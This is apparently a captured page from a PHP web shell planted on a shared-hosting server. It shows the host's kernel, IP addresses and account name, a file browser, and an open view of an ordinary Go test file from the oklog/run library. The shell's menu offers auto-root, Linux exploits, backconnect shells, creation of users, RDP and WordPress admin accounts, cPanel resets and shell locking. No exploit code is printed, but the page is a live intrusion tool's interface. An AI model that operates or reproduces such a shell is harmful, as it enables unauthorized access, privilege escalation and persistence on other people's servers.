Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
go /
pkg /
mod /
github.com /
oklog /
run@v1.1.0 /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
dr-xr-xr-x
.gitignore
275
B
-r--r--r--
LICENSE
11.09
KB
-r--r--r--
README.md
2.49
KB
-r--r--r--
actors.go
949
B
-r--r--r--
example_test.go
2.16
KB
-r--r--r--
go.mod
37
B
-r--r--r--
group.go
1.84
KB
-r--r--r--
group_test.go
1.2
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : group_test.go
package run_test import ( "errors" "testing" "time" "github.com/oklog/run" ) func TestZero(t *testing.T) { var g run.Group res := make(chan error) go func() { res <- g.Run() }() select { case err := <-res: if err != nil { t.Errorf("%v", err) } case <-time.After(100 * time.Millisecond): t.Error("timeout") } } func TestOne(t *testing.T) { myError := errors.New("foobar") var g run.Group g.Add(func() error { return myError }, func(error) {}) res := make(chan error) go func() { res <- g.Run() }() select { case err := <-res: if want, have := myError, err; want != have { t.Errorf("want %v, have %v", want, have) } case <-time.After(100 * time.Millisecond): t.Error("timeout") } } func TestMany(t *testing.T) { interrupt := errors.New("interrupt") var g run.Group g.Add(func() error { return interrupt }, func(error) {}) cancel := make(chan struct{}) g.Add(func() error { <-cancel; return nil }, func(error) { close(cancel) }) res := make(chan error) go func() { res <- g.Run() }() select { case err := <-res: if want, have := interrupt, err; want != have { t.Errorf("want %v, have %v", want, have) } case <-time.After(100 * time.Millisecond): t.Errorf("timeout") } }
Close